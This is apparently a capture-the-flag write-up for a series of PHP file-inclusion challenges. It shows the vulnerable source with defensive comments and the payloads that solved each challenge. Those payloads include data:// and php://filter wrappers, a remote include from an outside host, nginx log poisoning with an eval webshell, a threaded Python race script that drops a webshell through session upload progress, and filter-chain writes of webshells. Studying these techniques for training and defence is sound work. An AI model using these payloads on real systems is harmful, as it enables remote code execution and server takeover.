78
<?php
// Challenge 78: the request parameter goes straight to include(); nothing is
// validated, so any local path or stream wrapper the worker can read is
// accepted (the payloads below use data:// and php://filter). The control
// that actually holds is an allowlist of permitted include targets; the
// string deny-lists of the following challenges are bypassed one by one.
if(isset($_GET['file'])){
$file = $_GET['file'];
include($file); // untrusted path/wrapper reaches include() unchanged
}else{
highlight_file(__FILE__); // no parameter: render this source
}
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgKiIpOyA/Pg==
?file=pHp://FilTer/convert.base64-encode/resource=flag.php
79
<?php
// Challenge 79: deny-list on the literal substring "php". str_replace() is
// case-sensitive and matches only that exact substring, so every other
// wrapper is untouched (the payload below uses data://). An allowlist of
// permitted include targets is the fix; a wrapper scheme is an attack
// surface, not a file name.
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file); // removes lowercase "php", nothing else
include($file);
}else{
highlight_file(__FILE__);
}
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgKiIpOyA/Pg==
80
<?php
// Challenge 80: the deny-list grows to "php" and "data". The writeup's two
// routes both avoid those substrings: a remote http:// include (which only
// works with allow_url_include=On — presumably enabled in this challenge,
// confirm) and inclusion of the nginx access log, whose User-Agent field is
// client-controlled. Defender-side hardening: allow_url_include=Off,
// open_basedir, log files not readable by the PHP worker, and above all an
// allowlist instead of a substring filter.
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
include($file); // still any local path, and any wrapper not named above
}else{
highlight_file(__FILE__);
}
?file=http://49.232.213.200/shell.txt
POST:cmd=system("tac *");
//日志包含
?file=/var/log/nginx/access.log //查看到日志格式,发现UA可控
//UA写入一句话木马
User-Agent: <?php eval($_POST[a]); ?>
或 <?=eval($_POST[a]); ?>
//注意包含后并不会将一句话木马打印出来,因为 PHP 代码会被解析执行;此处 eval 前没有加 @ 忽略错误,所以会有警告或报错
//include含有一句话木马的log
?file=/var/log/nginx/access.log
a=system("tac f*");
81
<?php
// Challenge 81: ":" is added to the deny-list, which rules out every
// scheme://wrapper form in one stroke. Plain local paths are untouched, so
// the log-poisoning route from 80 still applies (as the author notes below).
// The filter still reasons about the string rather than about which files
// may legitimately be included.
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file); // no ":" → no wrapper scheme at all
include($file);
}else{
highlight_file(__FILE__);
}
日志包含,同上
82
<?php
// Challenge 82: "." joins the deny-list, so nothing with an extension or a
// dotted path can be named (the author's note: log files are out, only
// extension-less files remain). The writeup's script below targets the
// session file /tmp/sess_<id>, which PHP's upload-progress feature
// (session.upload_progress.*) writes while a multipart upload is in flight.
// Defender-side: session.upload_progress.enabled=Off removes that primitive,
// open_basedir confines include(), and an allowlist of include targets
// removes the whole class of problem.
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file); // no extensions, no relative ".." paths
include($file);
}else{
highlight_file(__FILE__);
}
相比上一题过滤了 . 无法再使用日志包含,需要包含无后缀的文件
//无数次失败
import io,threading,requests
url = 'http://67363ea2-74cc-40df-81c3-3447bff4cd9b.challenge.ctf.show/'
sessionid = 'test'  # value of the PHPSESSID cookie; also names the server-side session file
# POST body sent along with the session-file include in read(): the code
# planted in the session file evaluates $_POST[1], which here writes a second
# file into the web root.
data = {
    '1':"file_put_contents('/var/www/html/2.php','<?php eval($_POST[2]);?>');"
    # writes the one-line webshell to /var/www/html/2.php
}
def write(session):
    # Writer thread: keeps re-sending a multipart upload with
    # PHP_SESSION_UPLOAD_PROGRESS set, so the server repeatedly (re)creates the
    # session file for PHPSESSID=sessionid with the posted progress string in
    # it. This is what the author's note about "threads writing the data right
    # back" refers to; the server-side knob that removes the primitive is
    # session.upload_progress.enabled (cleanup of the key is governed by
    # session.upload_progress.cleanup). Loops forever and is never joined.
    fileBytes = io.BytesIO(b'a'*1024*50)  # 50 KiB dummy upload body
    while True:
        response = session.post(url,
            data={
                'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST[1]);?>'
            },
            cookies = {
                'PHPSESSID':sessionid
            },
            files = {
                'file':('test.jpg',fileBytes)
            })
        # print(response.text)
def read(session):
    # Reader thread: races the writer by asking the challenge to include the
    # session file by absolute path (no "." or ":" in it, so the 82-style
    # deny-list does not reject it), posting `data` with it, then probing for
    # the dropped 2.php. Stops on the first 200 from that probe.
    while True:
        response = session.post(url+'?file=/tmp/sess_'+sessionid,data=data,
            cookies = {
                'PHPSESSID':sessionid
            } )
        response2 = session.get(url+'2.php')
        if response2.status_code == 200:
            print("+++++++++++done+++++++++++")
            exit(0)
        else:
            print(response2.status_code)  # usually 404 until the race is won
if __name__ == '__main__':
    event = threading.Event()  # created and set but never waited on
    # One shared requests session: two writers keep the session file
    # appearing, three readers keep trying to include it.
    with requests.session() as session:
        for i in range(2):
            threading.Thread(target=write,args=(session,)).start()
        for i in range(3):
            threading.Thread(target=read, args=(session,)).start()
        event.set()
以下几题(83~86)均可用本题脚本,因为多线程,就算有删除指令,会有进程将数据紧接着写进去
83
Warning: session_destroy(): Trying to destroy uninitialized session in /var/www/html/index.php on line 14
<?php
// Challenge 83: tries to clear the session before handling the request.
// session_start() is never called, so there is no active session here: the
// warning printed above the source ("Trying to destroy uninitialized
// session") confirms it, and session_destroy() does not touch the session
// file that the upload-progress trick writes. The author notes the 82 script
// still works. Filter and include are otherwise unchanged from 82.
session_unset(); // no active session: nothing to unset
session_destroy(); // emits the warning shown above; deletes nothing
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
84
<?php
// Challenge 84: before every include the script shells out to delete
// /tmp/*. The command string is fixed, so there is no injection in the
// system() call itself, but delete-then-include leaves a window in which a
// concurrent request recreates the file (the author's multi-threaded script
// relies on exactly this). Deleting after the fact is not a control; not
// including user-chosen paths is.
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
system("rm -rf /tmp/*"); // runs as the web worker; a race window opens here
include($file); // …and is still open here
}else{
highlight_file(__FILE__);
}
85
<?php
// Challenge 85: same deny-list, plus a content check before the include.
// Two problems remain. (1) strpos() returns 0 when "<" is at offset 0 and
// false when it is absent, so `> 0` is false in both cases: a file that
// *starts* with "<" passes; the intended test is `!== false`. (2) Reading
// the file and then including it is a check-then-use sequence; the author
// reports the concurrent-upload script still works here, presumably by
// landing in that gap. Neither check replaces an allowlist of include targets.
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
if(file_exists($file)){
$content = file_get_contents($file);
if(strpos($content, "<")>0){ // see note above: a leading "<" is not caught
die("error");
}
include($file); // the file may have changed since file_get_contents()
}
}else{
highlight_file(__FILE__);
}
86
<?php
// Challenge 86: identical filter to 82; the only addition is an include path
// set to this script's directory, so a relative include target is resolved
// there first. Absolute paths (which the writeup's session-file target is)
// are not affected by include_path, hence the author's note that the same
// script applies.
define('还要秀?', dirname(__FILE__)); // constant holding this script's directory
set_include_path(还要秀?); // relative includes resolve from there
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
87
<?php
// Challenge 87: a write primitive instead of a read. Two ordering defects:
// the deny-list runs on the still-encoded value and urldecode() is applied
// afterwards, so validation sees a different string from the one used (the
// author double-encodes the target); and the "<?php die(...);?>" prefix is
// meant to make the written file inert, but a php://filter write chain
// transforms the whole buffer, prefix included. Decode first, validate the
// decoded value, and never let a client choose a path under the web root.
if(isset($_GET['file'])){
$file = $_GET['file'];
$content = $_POST['content']; // read without isset(); never validated
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content); // decode happens after the filter
}else{
highlight_file(__FILE__);
}
?file=php://filter/write=string.rot13/resource=1.php #url编码两次
POST:<?php eval($_POST[1]);?> #ROT13编码一次
//1.php为一句话木马文件
88
<?php
// Challenge 88: the deny-list becomes a case-insensitive regex — "php", "."
// and a set of symbols including "=" are rejected. A deny-list over
// characters is still a deny-list: wrappers spelled with the remaining
// characters get through (the payload below is a data:// base64 body whose
// length needs no "=" padding). Allowlist the include targets instead.
if(isset($_GET['file'])){
$file = $_GET['file'];
if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
die("error");
}
include($file);
}else{
highlight_file(__FILE__);
}
?file=data://text/plain;base64,PD9waHAgIHN5c3RlbSgidGFjICoiKTs/PmFh
#<?php system("tac *");?>aa
116
//打开是一个视频,把视频下载下来,分解出一张图片,是文件包含的源码。
<?php
function filter($x){
    // Deny-list over the requested path, case-insensitive: abort the script
    // when any listed substring appears, otherwise return nothing. Whatever
    // the list does not name (other wrappers, other filters) is allowed
    // through, which is the limitation of this kind of check.
    // The pattern is reproduced as transcribed: PHP skips leading whitespace
    // before the delimiter and ignores whitespace among the modifiers, so it
    // still compiles — confirm against the original frame.
    $denied = ' /http|https|data|input|rot13|base64|string|log|sess/i ';
    if (!preg_match($denied, $x)) {
        return;
    }
    die( 'too young too simple sometimes native!');
}
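// Default to the video when no parameter is given. As transcribed, isset()
// wrapped the whole ternary, which is a parse error ("Cannot use isset() on
// the result of an expression"); the isset-guarded ternary below is the
// intended form — confirm against the original frame.
$file = isset($_GET['file']) ? $_GET['file'] : "sp2.mp4";
header('Content-Type: video/mp4');
// The deny-list in filter() is the only validation before the read below;
// file_get_contents() will return any path or wrapper the list does not
// name. An allowlist of servable files is the proper control.
filter($file);
echo file_get_contents($file);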
?>
117
<?php
highlight_file(__FILE__); // source disclosure is intended in this challenge
error_reporting(0); // hides the notices/warnings the unguarded reads and the write below would print
function filter($x){
    // Deny-list over the write target, case-insensitive. A match aborts the
    // script; anything else passes, including wrappers and conversion
    // filters that are not named here — a deny-list can only reject what its
    // author thought of, which is why an allowlist is preferred.
    $blocked = '/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i';
    if (!preg_match($blocked, $x)) {
        return;
    }
    die('too young too simple sometimes naive!');
}
$file=$_GET['file']; // no isset(): an absent key yields null plus a notice/warning (silenced above)
$contents=$_POST['contents']; // never validated
filter($file); // deny-list on the path only
// The "<?php die();?>" prefix is meant to make the written file inert, but a
// php://filter write chain (see the payload below) transforms the whole
// buffer, prefix included. Letting a client choose the path given to
// file_put_contents() is the defect; a fixed directory with server-generated
// names is the fix.
file_put_contents($file, "<?php die();?>".$contents);
payload: file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php post:contents=?<hp pvela$(P_SO[T]1;)>?